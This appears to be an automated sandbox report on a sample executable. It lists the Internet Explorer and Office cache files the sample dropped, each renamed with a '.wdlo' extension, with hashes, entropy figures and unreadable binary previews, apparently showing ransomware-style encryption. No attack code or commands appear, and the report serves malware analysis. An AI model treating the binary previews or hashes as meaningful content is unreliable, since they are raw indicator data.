                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.9527894204933647
                  Encrypted:false
                  SSDEEP:3072:tl+7o+1eRuqTK4vVfO59hnAbnIPjh/9+ruvcWQrz2hrVFv/tuSEOuSqvfrfVgDXC:PeTgTb5O7JAo/PvDQrz2h5FHWOuSqfh1
                  MD5:1C06CFB474C061BE18FD1D10E29B10B8
                  SHA1:E888F9C2161D46DAB5B6FEC26C3B7F644FD5326D
                  SHA-256:DB9F5A34176DFC85113D2A7EE1382A498842FDE9E556B5A232DDBC3D5D6ED266
                  SHA-512:6AB0624988BA26A6575E519F395087011F5C50A11C601034BDCB5DF6655C66D5BEACC72A02D0FB90C98744956DF2DE04142954367F2A0186EFB3327E44638501
                  Malicious:false
                  Preview:cy7..*.|.dX..A..X......hc......._.!....D.5~..b..V.}>..x.=.E..E*.......s.S.N....v7#.`.....s*".A.XHi....3%E.. mv......pj.g...i..LV.<..V@....f.......y..k..y.../.Y... I....N2...5=........-.T..><.B..x~....j..$__A.n..x....f.....X..'...C.@..Fp...Y...Y.k.E.)~@>s.......~l.p.t.aO..e.1a6.....u9.E4vc+{0..w.>.P.Z..8&...g..u......o<.{.F....NDL.6q.>(<...W.9......Z/?..%GmC...Q_i..w..>l...3.>...E.T.O..y..\.).sxO.Ue.A(....S.......I...g...../G.........o.6.[..p..*.~._..O..f.0.Ff..%.n.a...Zv.D....:.......;5e..M.7".)..j....m.`.m|....K0#........^]..*.*g....&.KK...-.%,.R'..s....I....3.....?. .F.M?./".J$vc.I....;.--j.iZvh.@....o...1m....u....)d.....T..*6.FDl.;.].*...QJa.^..@....f2em. f.....JE0..?....R8..W....;...S..E.F.dy..&b.T....<,..s..P.-_.........E.{..gX...@".z...]=.\.d{...'TuB....M........,.d."$..2+P.8.z)...(;f..Dl..].M4.8...7....n....B..3.$.(..n.Q.e.T.G.R..}...~...d..*...Y....H....o...g...u..c............8}.fB......h.g.y>WX<.y.(7.....{.z..Z.?..z.d.p..V.

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2080723711352337
                  Encrypted:false
                  SSDEEP:3072:S3tWKlLany1+pA+XG8QCrzB0qHQT/Nml85b+OJ4z3JlVnHdz:QXWyT+rRb0Hb/4VlVnHdz
                  MD5:3A7F9329D54F26CE56F280A153D911C8
                  SHA1:71AD80596DDA06CB4B65D51BFE9F4A7653C90158
                  SHA-256:043D2D5FBF971B47744B33935A5D4C09FBA2429E243A96352E2786989BB3FDFA
                  SHA-512:D3AB20370F70249E5A1A76EF4FB695A54A55171A012570D051584BC8FBF8B67A683B8F29E30F47FE9632C5042DB17BFF7A6DD276A4C0C9393B367E53D23C8296
                  Malicious:false
                  Preview:.....7.A'.6j..+GE.......X....4..hs...*;...A...w...i[o.I..........V.I5.8........).V.^Y......-.p .f....U...A...zO .I......F...v.....H....l.*..c.`?Q>E.....WD..%7..*,+...u.[..:0..*E......RP.z...K..$)?.s..g...1.v...b.as...........Y......._.cR.g..-Gy6.xJ...s.xFB......A/...W."W...g.<..........46.....Q..7+.$.......,n.^.c.....D.3`..KF.O.36t7.h ..P.~..['..J...D.#-9.2Tf.V...W.`..u.'.]..o...j........n...:.B.....Nl.Mr.?...[.....g....W&..G.-X.q.....&..&...`;......_..,!......=.._F...t..;..2`.U.}..W...D.].T'..,%.....H.j......6.6).8....%.8.,.=..T....q.(.{W'..~v...b..p..V1.B.....-..ha...(.g....Z....h.<...z.GE.x..#..:.z. ...B......tt.}.o.s.....S..z....-..>T.'q.."p..<.........HTt.......X..x.>..:.Fv...Z....7i..F..uT.|..Y..R.g..<..1Q.QOg.b.......a..{....ET.D5../j:..j....i....!B.O.4..,....<..!](.y.h.+.=I.......O....gsjL...{....n&S..1.K..w..".vZ!.&.....&a...p0..7..{X..j...&..Sk..K...x....xg...?...M.....O...@V[....F+...x.wfE.\.a..~J'!..._/E....|.....pG...H.Y

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2070026107324643
                  Encrypted:false
                  SSDEEP:3072:c4pgtJsy3zdfRhXOlBVwxURRVCALH1g6ubUklFCFUEdHIpLST0bEq:cB97XOHGAzj1gUklFcUEWpGTk1
                  MD5:0923DE91D2DA4276A1AC831E04654DCC
                  SHA1:A4C863A343DF52759571191D1213BA0F5D29EB24
                  SHA-256:39CBB5246878DEE215143893223C3BD8F4390CBF097D6244AFE2AABBCD76E7AA
                  SHA-512:2AEFDA6155EAB9722E7C5DCBA1A275309E804336B05C94278C9F3BB7F7B8D209681444DCD134EED707CC7C8ADCDEAAACEB2F0DA7E9AB9092DC039E02A34523E2
                  Malicious:false
                  Preview:.........9..&k..J..z.....j...6...B...|...fVf.$.Q.nIB*..i. -.uM9..`!d ._*...4......K.X.c]kGz......<....(.L..........r.|$;.....@^0}.%.'..@...D.=..Y..b..k,D..M.sy.1vD..E..`.N......c.Z..qfi.Pa-.._..9G..8....0...'...!,A.6.pH(F}sL...,.....o7.._J..Is.C...5+hj..t....]..*%.7UA..:.8..q..y...c..3Zgp..\...m.....9}.>.F..&...&...l.*....D<.!.{../........tOI.+. N..q..HJWAF......?!.7N..O8.9..R......C.N..88q.V2.9."...?I.`3.:.o'y...@.<..P~%:.../.....,.L...z...`......}.=..#.r+3m..kV..`.1s.'.N.....o.;TKb.4l.....'.0..\'.(fd.|:^.u..b...l...}......(....I.S....f.s.Y.;n.B.&.F.-..^y......y.^..?..J.........?@..M.&bc..okSmuI^..<......c;..8c.r....*.e.....~...q..g....|.."|L.u...Sq..^-.....\.%V>..."...,.(..P+c.'..Z....v+...,...f.....Tv@.|.MHD.W.6....3...?.".F.Y.o.D.G.1.. ....c..|.%....@......g.Y..c...q"c...dp.L..{....I..1vL..Nm.6.].<...A6.....-.....~9h..A......H......j.5-oi.L..8.r...J...t.Y...Dr.....&.....lW.=,..?..8...g..E.x..+I.-3_.y.ys..)8..s....b........;......du...

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbtmp.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2088213282072804
                  Encrypted:false
                  SSDEEP:3072:d5lIXjk97vXRsiG1YD1oDP+D6BDmp79Fq4lur9mNNiZ7EdSyTM5jY:d5lIzk97vBfG1YhoSl7Jlu5mAEd9M5U
                  MD5:7B9AF6D3327B7199565C429EAF814926
                  SHA1:90738E461538F3D12730A71B238B55DB3F7E5185
                  SHA-256:5702881E5EADB9A7A682754D8A14A83BCA6E68A68655A73C8725247DD36822BD
                  SHA-512:2D88E2DD5578DD2216E2DBA25E6679CFA1AD553F3024A14813BAFFDD61E94E649C6339C27D0923AE446FFE1E3D8A30E1B2AE047261961F9C98311A86C4F90893
                  Malicious:false
                  Preview:.....9Nm.....X.....;r..h4.(x.T.qW.._....Q.....T.Te8..a.i.b..?.}.2.N..;jE.J>.A.<..O\&..T..:....R..C+N.....$.F..R...M..o.|.......]..O...;.a.@.@.....B.E./J).(@e.(je..@.K.?........p.^.3 1....0.GV.t.6.z...}.o.>B.]DV.7...p.p....#... ...J....|C.._@.w\.M.1..J.......*.z$../.V....kc;...vOE*]..._....RO.^.!.(>ot.4.y.@+Z.\....-X.......+F......f.T....o13.|_3.`.\X.@N.....^e....%...T..K%.,6..|J.}.l.(..J..&......x.@.....##8_V...l.....Vt...AX.Fa.@..i..m`....E.....yBu..7.K......F..uF)fxifH............K....Pn39EV.?.{..M].]...UZ_8e.^`..n..n.N......g{^D...\L.....O<..e.Z/...T..K......o....nW".M.l/..\.,.$.<c^.Ee..._O.&.......c.......w....E....xH....]D....N....G.j.5.s}..i.7......w.`...'.*%9.A..:fd.....v..$...<....p`b...,\....Z4?Rsr.'.\?~3..Q..f. lU...K.Y.W.7.....H..!$8..fS...e.Q...3#y.LH28.$.8....4.IO3.jpJ.....N.7..B...X..K.......Pp....(x.Q.3.-+78.....i.i......2D..........&XH....:]..#..\.-@.n-.`..7>T..B}..U.........#.JX.z)....-..LBec...|*gHT.\..Tyhg..q.r.

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3384
                  Entropy (8bit):7.938702831300155
                  Encrypted:false
                  SSDEEP:96:bV3r2vNcxokbP2An9/iTmrYixQ5mU8MjSZ:RKlcoSPl9/jrbU3o
                  MD5:2EE6C5F17C515FABF5ED161A7B6DB21D
                  SHA1:CBEA41B4488F85DF9B943567ED541BEF3F0DDE27
                  SHA-256:DD47E25971CBB804BA39FAF7A4E71568DA64B1A9DCC0104B2D6F11544303E60A
                  SHA-512:A0D34B1A1E7DFE62D3310813B4367546F21679160792A0756D3DC391CB218662250DF8CAF0188CD64B45D1316304EAB01AE548D083111A6C9C3103615FB4A862
                  Malicious:false
                  Preview:<?xml.7....EP.q[.{GBM2......(.z9...6%..v\..w.p.....j .........f0.*..|....V}.9q...k...f..Z.{.....zFM...)K...7..W.&.....|..J.h.....[A[.....%.vB,.z.1....c..X.e.......r..^T.(H.)a...o|..j.".....f.....O.b}.xM.C\...`w+.+.md.b........S .(.Q.-#..Y...jB..W..i<..............~/..Z.. u.+g].....#...7[;.*.].9_q..S..<.30DJ......N\...]...........G.f...:.R.......g0"....z.W..3@E..w.z......k.JjV..N...c.~.U:/~f.@.._..1.=o..0.:.;.:.{....O!......;....._..m6.....=.e....L..8lS...F.y..~l.;^E..^\....6C...M...h3...5.-... ....X.)...x....L.Z7K.(.V.~.$...9*:..)..y\..a.K.....%o..N....:.....Z......*&EJ([:..>.C......#<C.O..d'j.}&.}h`.zq!.......|.}A.....dZ...s...".#v..K..f. WQ.....H.....F.M6...bA.k6.I...r....[.#i.Y...$.....B.q..!M...k.\..:.H..X.."\Y/..."v......fL...x.....5HB|.s..nr.._f....0g.Z.....E.O.7N..zPK.Q...d.{]..b9...].m..s.1.{W|_.7j6.....A.f...k..?..S..N.........r.@fo5.^>..v....UA..\o...Yd.[.R..9+..L0..'..C.X.p........`...H1=.=...K,7.%....s).J..f....o.U.).I+.4.dy

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6910
                  Entropy (8bit):7.974393349882814
                  Encrypted:false
                  SSDEEP:192:7g850rtfMSP0D5Bk7XszQ9iMQz5VqBsNj:7g85cN0VBqczQYXVHNj
                  MD5:79D1CF98C7B4D059C4497DEC733CE2B4
                  SHA1:DEB1FFCBF2B7D5839DEB529CD459A590C0EB5E5A
                  SHA-256:4A05AF782DB93F390BDE65E434268A02CECF13EA3350F2D0674006F75C075067
                  SHA-512:6DD1DAC26A0D5CEC2FC701B31DCDADE87A24B129236836B5FC84ACD2BD0D2466AB78765B5D54483D2409F7F200862BB5A1C503776FF6D9BA9B53C98F27C633E6
                  Malicious:false
                  Preview:10/05T.d..p...........n.3.-...o.....7....G...M..}.^m=...N..T/..$....4&..`&.....)......B6.W..{,..s.H,X.~.;.$5.i..F. .h...'...fM..w.q..;T}..TN-...G..u....,SE...w\..(.F..c7.LE.U...T%.cXLN..S.NQ.].......[[....U...~.vS...C..)x..mP.CN-}Gu..^.,.{..".e.s.o.M..C..@.|.O.~.WA%.C..]..g.[.1Cz`M\f..%$\%.D..v..7...2.'.5_.O.%~`...p77>.@..5......b...&....F7...x..M..6...2.bA1....jC..r@..RU.5.n...4z...V..A..o+...]-......<X.....WV.....T....{l..9Q's.P%|..u.-F.Z........]...;.~_o%..LDU....,....L?.7....].O.4...P.C.h.TL.G^/.9...T..>l-.y...x.0.>.....B+....,..2.7ELy..:^....f.=#....O..Zj...z6.._.5...I.K.^...u~.K..?.T;...0m.~m.4.#.....y..........>.....C.2..~9..z......- ...w.w.P......e.%.....YR.....M[..w...~...[AI.N.U..9.....+9.#.Q..X..u0.J.A2...o.l..m...N.Ce..wTn...F.......Bq.../.E...3.l.O...."puF.}.\IX......AH#...Wu...1...~C....HS........W.b..<.tncp5..B.+btT+.A...."@..~L.e.(...@.^...<...{0.c.y^_.....zm...t.V$...;`sVF./...;H...p.c..V.G..5.....)...U..i....

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                  Category:dropped
                  Size (bytes):834
                  Entropy (8bit):7.709405280168827
                  Encrypted:false
                  SSDEEP:24:QgLQN4sCYefROglQf22pYxf7tmCi3gfIkJpgS3zbD:1LQN4sCbLzV7tm9SmS3nD
                  MD5:1A64A473AB70411D6B930E3EB726937E
                  SHA1:ACF1403859E14790E0DCA426F0582AA373C2800E
                  SHA-256:AC4243E44F3394A3F871DF466F65EDC9FC5FEF7FF5C5C416F330695961B4E92D
                  SHA-512:0EA9C451376600FA2F8BAAD48F663808B181752097085FD451161B2BBCF57E270145DB918974EAB4CC7DC1CAFDEB213016F0CA89F13DAC60B3111AB9038E3E36
                  Malicious:false
                  Preview:..1.0...g].....1..R.T....#.. -.F.c.g.U.^s_%BI3.;.....P.].".]..~.k....q....?.....qdil..].*J..[....*...t.t..+........K..w...z........U*|(.q..~..,.nfpnQ....B...As_...I..+...}..k......p./.j0.].[A...3`..-`.1....A.+*..N4.Y...CZ.b'N".6M..........[....Z,..f.HD..N..h...8.....!.....Cepk..Ye.@v..Z....".......:.......j.%..Y.yH.._r.....HG>.....K.n..2..K....P.5]......y0.Gq....x.YZ.. c{.*s/I.$.cg.~Qnxnjc..k.q..x.o.cBi^......a.]..../.|.N.O."..j=cb8.~.Kn..E'..Bv..J..gwM.%L.A,......n4ZC./.z/a...o....a.G;.T..P9m...9JM...1j....qa^R..a.>....}..>W.UWi..P....[61.|.....#..N.z0..n".........|...e...i..f.o/......0......D..p.......]....2.6.bi.....mN.N..2..P.V*j...u...l ......ZA."....$.iN.(.g.q..F.cxUu......L.......f7.%....CA......H.H..;.^.Hi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (870), with no line terminators
                  Category:dropped
                  Size (bytes):1742
                  Entropy (8bit):7.897127674945163
                  Encrypted:false
                  SSDEEP:48:rviEobU2gt4pIxe/hWKjHi5/ZWbcVJhTPr1Om0cdJSMq23nD:ra5yLI/wGHmVJhTr1N0czSY
                  MD5:66E94343EC2D33A62DCB7DDA57EFB301
                  SHA1:447AD5FE4CF170A26E6827C4AA06AD66C8E1DB1D
                  SHA-256:E84C9CA9F88F51B6BF5A24800E9DE7570B345BE3E5117BC10D3953506638E359
                  SHA-512:3CFFF521DBA53B7574EF67EF2B39CB473FE3B760E3F3DECAB61C535D74C16C740E4FABD4DA091205DE86ADB0A8C9151413FB5F8BD97DF8F5820138D0088C4727
                  Malicious:false
                  Preview:..1.0u.C..".\M.l.....<.3..e."...|..!...W...m..,...U.C,.\t....5...[?n.'.x..u.."N+..U..r.=.....m....i.....!%..R..U..M_}...|X..z...../V....].C........"!..snN]@.J]).\.H..j.]~v....g.AA.&S,Xo=9S..q"\..f..HS^.......|..,..`.2.n..;C]SH.1J, ......vo..J..M....c..B..N]a.....]../.ZK$.Eh.P..dL.v....z.!...R.....)....,hl.....M..E.+..3.2.Q..."..K%B.....^_.^.5...E..}.f.wJ....P....\....6..1.(.4H+... ..2.F..F=N3.....`.?...Igz......gk.....=..O".E...D+c...Z.n......l....0.......&gg0......;.?c...b...'.T(j.,.......Mr....6^....w~B.p...}.n!~.(.=.#.a./.*...>..H.....Z.p3.O...RLA/..^B7..F...<T=..y.>IN.."dS.....f@w.,u...~F.re....f]u...Q..^...,.@L..^.>2..8....*.4M.{..2..S.P8.....;+5..\zp\.^6..G5........B...U\C.Kw&.\.BM.....QJb. c.Wu...o{2....>.Zt..uIT...<..G=>.7....v.....Y...A.;o...1w......6.]..H%.[p....'...d:2............O.;,X.....{{C.....Q.iX..J.9<..`66I.2@....P.s.!'d.(...|m_o..y...........k.#gC.o.i..k^..]...-.....`d=\.....!Y.d.Q.b*.4Oa.......e5Hq.......eej:ca.

                  C:\Users\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1062891
                  Entropy (8bit):5.530767242533431
                  Encrypted:false
                  SSDEEP:12288:phlrxJ0jTG8PgXSZlV0N8x5thr291gess3TylunXC:pjrx2q8PV
                  MD5:5A8DA32287F562E6ADC513234C884BA4
                  SHA1:7B62B4D448AEA17C4E86EE66525A22F33B8A4411
                  SHA-256:59AE5B99E23E625180788C0CEE003A008AEBC3270935FAAE69C4BC323C8BEEBC
                  SHA-512:4FC63C7D4129CC8343EF60E5A0DA8EE2486B9D409C3EB7523BA43100EE3FF5AC1B39D39D038F33EF1E7F6E0ACA0A605660EE225EB5A4AD7A1C58CBBDC2D9F066
                  Malicious:false
                  Preview:<Rule.Z.K.8.S.e..c...:.%S.J.6..(A@........zs#p|~..-Jn....;>.......|8.V...FJ&.....8.rI.....P*.f7w..x.....@r...G...&!..|Xp..0^.MF4.......f..J.r.\JU7%..$n....a.8:.I...H..<.U...Z~.&A.@D].......K.R.?..Xl..\...T.>..i.@sQ.+..9.."..6N*.~..lj..7.nGm.0aG.....S^..Gl.z.....:1.tn.....<...Zo..J.........W...%/.1..4...I........;..X..69..-w75...A.l^...J........f......Y3...=f.r.....\.e.u..$O..`.........?[/c.L...M.j.R.....Rn...E..\.j..e.W....c.9...6..2C...../.rm'F~}GQ....lg..f....U.<.....U.O`Fp.}..)..._...c....R.....L&.\..'.}...1......o[9V....."..hp._..Qd...+]..Wm....J...<..=...%..BUi....s..<.6......_.....{....]r.;.| S.......$}......i.x]..7.._;......*...v.Pxp.....L.ck.....t<.....[..V...0.c..........?.........?.l..:v..I..0.A..g.OCX...\..n..........+....RS3...:X.&X( <0.....N.v.....z{....[.....M2..6$.....3..c...]...2D=.._?*.#......;..N....5....C....^M...C.+......4.es...p.A~.k...Nyy..x..:.4..t._...K+.x%Z.g....Au{.o..~...T.p+...d.#N.W....vX.._..O.W.r..@...

                  C:\Users\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):320311
                  Entropy (8bit):6.633726832530076
                  Encrypted:false
                  SSDEEP:3072:yJ+YV4sO9c7UWZIHVhFZLBx7/v/N3D6++nySU7JZHHqPaw2EAd89Lw4/7:nYVtkc7/IdZtx13DoyX7JJS9AdwpT
                  MD5:59208F8757594032CB8F5299E5C1BF50
                  SHA1:222A151CB982B25076AE44B50D937BE0F2507084
                  SHA-256:D8CB167117E83C342D73C5BE97F7CD03C61C8E5A57AAD7292B8FC8A774B82569
                  SHA-512:F1B6EEB14B9326CC875CEA50A66A8462672A7796517BD0DF146E23300FBA99B8C71A8D712751014AAE1083055B8E89CA0C47BBA054B51F7FC433E8FA24036675
                  Malicious:false
                  Preview:<Ruley9Kff...;..+....S%.ORz..1.o...7.....5...s.P.........|]a...8.2:$zw)...z.H..6.H....du...usxf#\m....q...0..q..i.%.5.3.?......@37....Vc.......V...=%...y.t....N]..w..1.......$........J#y.4X.....Xk..exh...o=..q.H.13P..sq....w.3....;....>..?../...i.\q..U.0.0N...h..b..Q..^.^..p..+.<.._.coF."Gtz.*.M.g+.m.Z.......6.......j.t.QPW..IX8.axw..@Y...y....>D..Y.dp.`.Ap.XZ.N.\........@...t..@x..=.v...P .WH.),)l.BlW..R.a.i....]..U..jNn-x5.mN..x.XIK.X.odF..&y.m.Vae?<W`).<|...y.K~....`.ZB....]B.#%]ct.7.4.-."cmE.?I.....M.......(.......W....U..Q..2..`..3..{x....!9H....t.Mxs...}..K...3..O.r(..X.He`........H...,.5.H.+..A....}.U..w..B..o~...T'.I...o...]./....6q....T./+.!...^%.}.O.a.km.K...e.z..=..X............>h...m..y.HKaD..5..$..)I..[[..&...y..5c.}.:..........Q4..EV...[..V@. &.u.n..x.Up..n.t.M....yu...`..~.b7hg....1>..).9i.......$..+>....8K.....().(..l..0...}b..+.F.d......$0.8...s.b+.O.L.c.{.......`-L|a........~..\...2"...O...x..S$.......G...(_....-

                  C:\Users\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):361051
                  Entropy (8bit):6.514572838232696
                  Encrypted:false
                  SSDEEP:3072:Zknwl2Qrprufc7TvWzBrvFQPOElTic0hKvSti4VF+lT19FSmzc+kAWLK2/5:fl2Q9Y19rvFQrleb44/C3glMk5
                  MD5:0C239D2D2BF057630051E30299ECA539
                  SHA1:BFF2651A18481F9A64963C271DFD1B2F6C5AA6F4
                  SHA-256:38D49DFE71CD0BD3F6CCDF4257F563B03364CC4144468EF405E5305C423AC632
                  SHA-512:B0DA19B1B7DCB589F7BB92C5638AAEF603A7E2ADEF729461511DC5B084C5FEE1F1D3CC10421170DB33C3C532CBCBA7837A643A7835EB609E99AFB3D21FDF964A
                  Malicious:false
                  Preview:<Rule.....C.....}].w..y.=b.}e4z.C.....T...8ph..C.66.e........{C.`x...x.A..P].D....>$Q..R...1..h6.8..E./Vn.2..R.;Yq.E..v.w.......@Y...QG..0".F..=$..13w.....v..a..N..:.,...W......N....-..R...p...9..BYC..F.PD..I~!...v."......w........U...J.{.f.k.X.U:...TW9e.'..i.<G.8.Z.;Q....ukh...c..{....L......o.....h.....\r.:vY.w......B|...G..&.u...&)....4...:L$.j..t..0...s.j"r0SBUj.1...E.N....>....|=cS-Q.?.c9V......Jp[|.sb...N..A...k..?1s.D...DU..hc.xj..n:..|..\.m..]..S<.b.9...`P\....a.y..... ...EB.F...G...3e......-tA0.wX..4..y...5.!@M.l.k...0.WR....{c~jCz1.................&.....PF...]...........?~..7.....F.w.u;.G.)Z..~.c.7.?l....BU..*th.g.o....J.......[M......?d..N...;!...X.l..d...Zy..;@...6.S..l....2@.~.x.-..u?..1.{s....`.L'..(....f.;C.U.3.B."._E...6.\Ox....:$.#....[..e9r.(..3..........w.....I.S.j...A..&._..Kr..Y...@~fR.fT.Fu....Z..+}7.%<.....<|0...d.. .Z"..8m.va.X.......M..4..r..#.N...:/*........B^....I....6.....D....d.w~M...>(.3...}.Iy.-..^m

                  C:\Users\user\Local Settings\Microsoft\Office\Features\1-7FeatureCache.txt.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1098
                  Entropy (8bit):7.823795818429725
                  Encrypted:false
                  SSDEEP:24:MYXseL9hFzhEVal8wpdfGJlkpdYgYNyEEOFj5aXD/m3zbD:MYXNPFFE8VO3kpdYgYE6eT/m3nD
                  MD5:33C96B3B2A9F7A7542FEBA9905D1BEB7
                  SHA1:5F07F8AC2F2FC213D605885F95B1494653B40FA3
                  SHA-256:034ACBD43046B9E564DFE58AE9306B7049DD20A364744D6DAA1EAAE8031F87CD
                  SHA-512:B4C71155F7DBC1EEA877F0A37044CD76160121C9D67C5F6312045F8EB389B8D528D4D3BC9BD22A697C2C2031C9230F1B853D302927288F7366E63C83B4914185
                  Malicious:false
                  Preview:3.7.4.d....S...I!+.....e.6.+.q{.....R.RLH..B....z....7.G...^..s.x.&.eu_.... {).TW..!..Q`G.X...&....w.F'dF.L5n.....N#.*F..9.K..z...<.{..F8lj...Hg~....}9...}.....Zv.`..3.P......R.*U.~..fg}:./..).nq..E..8.}7..z.........s...Iq.....3@v..wM.x....;:N..z@8....1...~S....q...s~.>C.......5.*T.aW[..b...m../....b.R.I(. .u(.......=....]."{..._.,~....0K.2YV...,vg2...$@...2.}....M....5..P7....[.b:..<m..\.Ay/.3C.....5...).."...;...Ie....5p..2...+I.. O...LN~...<O".......j.d.z...|..9..a..y...A.T.k.......(%.......z.h....:.|..Li...'S.Q.k5[0.!...V.<T..f...{.L.1....b..*...o.Fv8.....JV.....i..|....Rq...3...a...,+.z.J....%2../.._.....5.!..UO....`.I....!~....O)G.>|q&..O.d.Y5.F..2...!].x.1KxUd...9;.?;.K....s......#/'..+..~..=..t..c..P..."...Bb...5..pi}.B..p..D..h.Q..|....\>F..jc...B'.;....r.|Z...\.e9)7....>...;.....6....o.......`.N..<.;..v......$DC..e`.-.m^...F..q.[.g..L-+Xh&.....u....w.*..7.T?.:(.._*\..vyh.T...X...._U.j.......".."........|.E..Y9.1Wo....2q..O

                  C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992674801553706
                  Encrypted:true
                  SSDEEP:384:FYYVOBBvimXPhl+1peoP3fMx5STWAVevpwA9qHbSnZgVxKhOROX2D4kkKfut4:FO31Xpl+1pfXy5STsy2nZgV4QRHrj
                  MD5:A342348E6EF6813B0A3F469C9FCFB760
                  SHA1:5F53308ADBAD2E0FD292FADEDD2EE355C6BB730B
                  SHA-256:FBCCDC3EFFA53337AA400F1A77186DA2BBB4A109582E9B4FEEF27CF66F517483
                  SHA-512:B2A7E8F822E675881A83C40BB3195F2AB81F65BAB505DDDC875ABDC202B7FC48B6D53FD35A8678AEC91C966B0EF5724242E42F2910FDA8B476F779408D37CA67
                  Malicious:true
                  Preview:SQLitGk...sI..........|.z<..*Y...5""...aAM. .`.....Z....IO...;....N.v......kT..j. <.."k.4..j...sL.i.4...$.V'..3.M.z.....n...f).......Z.E7.B9...R_......}1.g\.V..l./@..Q..f....1>XJ/..L...H...Ai1%.\7..N........Fu.c.mB...s....P.:.{...[.|.pU....\/..+.f.\..O."....x.,KH.....y.)...a2z..m.x@S8^3.tl...v...b....8.$....E.t..a....6.B.g.....zp.....fY....(.R....".(.... .3G..$.....#..aC..&u7.>L.N#..Sa..RT........O...._f.....'\H...Z...e9lf...&d...m......W...<c+W%b..i.-x;..]fCK*b...^].S....6....AQ2.....e,.Z.".Q.a..1Rn.........8.b..Y...G&c.]y..k.....1U..J.@.(.cd....`.E{o0ldt.n.u.J....}Q;Q5..F......%6,Ny..J..!.u..W.L].'.ifi.T.\$............_9.z1.k...2.^....j..cOb......-...C.......>..U?...`...../..s.i.i.>;#[......=<......X.I.id...{S..Gh......1Y...8.......\...iG....%L..x.T.0I.i..M.ER.A.3..K.e.;..xg.Y.W-../..)$.._....J........[d...~~.k.A....}..Z.%.0q..3.gy.^D...<..a..A..i..&.$|.[}j.....v..^J4....uo.rj...p1J,...zM3.I.........pL..'...J...<...Q....J....%.Z...Sp.|../&.

                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.99256097276253
                  Encrypted:true
                  SSDEEP:384:u27scSii3qCs3MM/Sm754nEUGswVI5t4LuvSpNY85lqOLwiGQ77vOqva+n4vb4F6:H7szs3am7bBVoUpNxlo67vOiZ4d35
                  MD5:10C5646BFB55BFF7D2FEB406626F3796
                  SHA1:1D40BC074694BFA60BA7780FF3F81D0ACEB7BADD
                  SHA-256:FAF9AFDE6B4624D08C8F9E7D44BBE1CCC5A39A44537C971F458E2544FCF35182
                  SHA-512:02828402F9199020D2C5228277135319BA854D518334A4DA1ECB977FFEE47F6470C2A4DC398A533D405A2C3F90CA19D85377981E18598C7E6B51075F21DDDAF7
                  Malicious:true
